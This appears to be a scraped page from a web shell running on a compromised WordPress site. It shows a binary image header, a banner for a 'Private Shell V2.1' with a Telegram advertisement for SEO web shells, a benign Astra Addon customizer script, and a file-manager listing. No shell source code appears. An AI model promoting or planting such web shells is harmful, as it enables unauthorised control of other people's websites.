����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
/**
* Astra Addon Customizer JS
*
* @package Astra Addon
* @since 1.4.0
*/
(function( $ ) {
ASTExtAdmin = {
init: function() {
$(document).on( 'click', ".ast-customizer-internal-link", ASTExtAdmin.navigate_section );
$(document).on( 'change', "#customize-control-astra-settings-mobile-menu-style select, #customize-control-astra-settings-mobile-above-header-menu-style select, #customize-control-astra-settings-mobile-below-header-menu-style select", ASTExtAdmin.remove_no_toggle_style );
},
navigate_section: function() {
$this = jQuery( this );
var sectionToNavigate = $this.data('ast-customizer-section') || '';
var section = wp.customize.section( sectionToNavigate );
section.expand();
},
remove_no_toggle_style: function() {
var self = jQuery( this );
var noToggleStyle = self.find( 'option[value="no-toggle"]' );
if ( noToggleStyle.length && astAdminLacalizeVars.astra_no_toggle_menu_style_deprecate == false ) {
noToggleStyle.remove();
}
},
}
$( document ).ready(function() {
ASTExtAdmin.init();
});
})( jQuery );
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| customizer-controls.js | File | 1.06 KB | 0644 |
|
| wp-color-picker-alpha.js | File | 15.24 KB | 0644 |
|